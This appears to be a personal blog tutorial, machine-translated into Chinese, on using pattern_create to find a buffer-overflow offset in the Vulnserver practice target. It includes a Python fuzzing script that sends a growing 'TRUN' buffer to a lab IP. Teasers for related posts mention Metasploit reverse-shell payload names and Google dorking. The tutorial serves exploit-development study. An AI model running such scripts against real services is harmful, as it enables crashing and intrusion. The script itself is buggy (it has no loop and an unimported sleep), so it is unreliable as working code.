pattern-create

发表于2025-05-12|更新于2026-06-10|Network Security

|浏览量:

通过创建图案查找偏移量

现在我们知道了与 fuzzing 程序的偏移量，我们可以使用 pattern create 来帮助微调我们的漏洞利用脚本和有效负载。

**！参见模式创建
（相对）
模式创建 (GitHub 存储库)

查找确切地址

现在我们已经使用 pattern_create 创建了一个缓冲区字符串，我们可以将模糊测试脚本复制粘贴到新脚本中（当我们对其进行微调时，它将成为我们的漏洞利用程序）。

import sys, socket

# Create the buffer of 'A' characters
buffer = "A" * 100

try:
	# Build the payload by appending the TRUN command to the buffer
	payload = "TRUN /.:/" + buffer

	# Create, open, and connect to the socket (connecting to target)
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect(('192.168.1.35',9999))

	# Send the payload to target
	print ("[+] Sending the payload...\n" + str(len(buffer)))
	s.send(payload)
	
	# Close connection and what 1 second
	s.close()
	sleep(1)

	# (if we haven't crashed) increase buffer length by 100 bytes & try again
	buffer = buffer + "A"*100
except:
	# When the target crashes, print the number of bytes it took
	print ("The fuzzing crashed at %s bytes" % str(len(buffer)))
	sys.exit()

[!资源]

Vulnserver

免疫调试器

我的自己的笔记在整个文本中链接。

我的关于基本缓冲区溢出的文章

文章作者: xhj

文章链接: https://hzhzxfs.github.io/2025/05/12/pattern-create/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 xhj的博客！

Network Security

相关推荐

使用 Burp Suite 收集信息Burp Suite is a web proxy which means it can intercept web traffic. Firefox Setup对于 Firefox，请执行以下操作来设置 Burp： Open FirefoxGo to menu –> settings –> general –> Network Settings (at bottom of page) In Network Settings设置“手动代理配置”： HTTP Proxy: 127.0.0.1 check ‘Also use this proxy for HTTPS’ 访问https://burp在新选项卡中访问 https://burp。 Accept both check boxes, then hit the CA Certificate button. This will download a certificate to your ~/Downloads folder. Back in FirefoxGo to P...

实用道德黑客简介：渗透测试的类型：外网渗透测试最常见的类型是从外部（通常是远程位置）评估和测试组织的安全性。这种类型的渗透测试是“最常见的”，因为合规组织每年都需要进行外部网络渗透测试。它们也往往比其他类型的渗透测试便宜。这使得公司更容易开始采用渗透测试作为其安全实践。方法论重点关注 OSINT，收集有关公司及其员工的开源信息。通常需要约 32-40 小时 + 8-16 小时来撰写报告。开源情报可以收集哪些数据（公开的）来帮助闯入/利用组织的网络并访问受限空间/信息？ *漏洞扫描：*外部网络端点始终被机器人扫描。通过被动扫描发现漏洞的可能性相对较低。大多数公司都有足够的保护措施来通过修补等方式来覆盖这方面的安全性。相反，OSINT 专注于“收集情报”，例如网络的拓扑结构是什么？登录面板在哪里？用户是谁？内网渗透测试从网络内部评估组织的安全性。网络已经被破坏，并且/或与客户达成的协议的一部分是允许将笔记本电脑/设备带入内部并连接到网络（然后渗透测试人员可以远程进入以执行评估）。方法论重点关注 Active Directory 攻击...

file-management

查看、创建和编辑 Linux 文件创建文件要在 Linux 中创建文件，您可以使用 touch 或将 echo 内容添加到文件中： 1234# touch creates an empty filetouch hey.txt# echo will create a new file AND fill it with content:echo "hello" > hey.txt 编辑和附加文件要在 Linux 中编辑或附加到文件，可以使用 > 和 >>。单个 > 将覆盖该文件，并用您在 > 右侧键入/放置的任何内容替换其中的任何数据。 >> 也会编辑该文件，但会将其右侧的内容附加到文件末尾。 1234567echo "hello" > hey.txtcat hey.txthelloecho "hello again" >> hey.txtcat hey.txthellohello again 文本编辑器：终端文本编辑器除了使用 touch 和 ec...

分阶段与非分阶段有效负载有效负载是指建立对目标机器的访问（通常通过 shell）的实际代码或可执行文件。主要有两种类型：阶段式和非阶段式。非分阶段非分段有效负载一次性发送整个 shellcode 或执行代码。这种类型的有效负载“通常大于”分段有效负载。上演分阶段的有效负载是分阶段发送到目标的，而不是一次全部发送。由于代码是以块的形式发送的，因此非分阶段的有效负载往往“不太稳定”。然而，分阶段可能是有利的，因为每个阶段都“较小”，并且在发送到目标时不易被检测到。奖金：使用 Metasploit 时，您可以通过有效负载的路径来识别非阶段性有效负载与阶段性负载： 1234# Non-staged payload:windows/meterpreter_reverse_tcp# Staged payload:windows/meterpreter/reverse_tcp [！我以前的笔记（在文本中链接）] Metasploit

#谷歌福如何在侦察和信息收集的背景下优化谷歌搜索。 Google 搜索运算符Ahrefs：Google 搜索运算符，完整列表谷歌中的高级搜索运算符可用于优化和过滤搜索结果。枚举子域要使用 Google dorks 枚举子域，您只需将 +-www 添加到您的搜索中：site:google.com。 12345# Search in google search bar:site:google.com -www# Actual URL:https://www.google.com/search?q=site:facebook.com+-www [!资源] Ahrefs：Google 搜索运算符，完整列表

种子文件Torrent 文件 (.torrent) 是包含下载相同资源或相同资源部分的计算机的位置和信息的文件。它们用于帮助从多个源下载大文件（而不是从一个源下载它们，这可能需要很长时间并增加托管文件的人的流量）。从多个来源（称为“播种器”）下载内容比以传统方式从一个来源下载内容要快得多。 BitTorrent 协议为了使用 torrent 文件来查找和下载资源，您需要一个 torrent 客户端。 Torrent 客户端是一种可以读取 .torrent 文件并与播种机通信以将内容下载到您的计算机的软件。 BitTorrent 客户端将查找文件中指定的 tracker。 tracker 是一个特殊服务器的地址，该服务器维护具有要下载的目标文件的完整副本的播种者列表。 BitTorrent 协议将目标文件分成块，并帮助客户端从播种器检索这些块。使用 BitTorrent 客户端下载 torrent 文件后，您可以选择成为播种者并让客户端保持运行，以便其他人可以从您那里下载该文件。安全IP 地址当您使用 torrent 下载内容时，您的 IP 地址对于正在下载或将要下载该...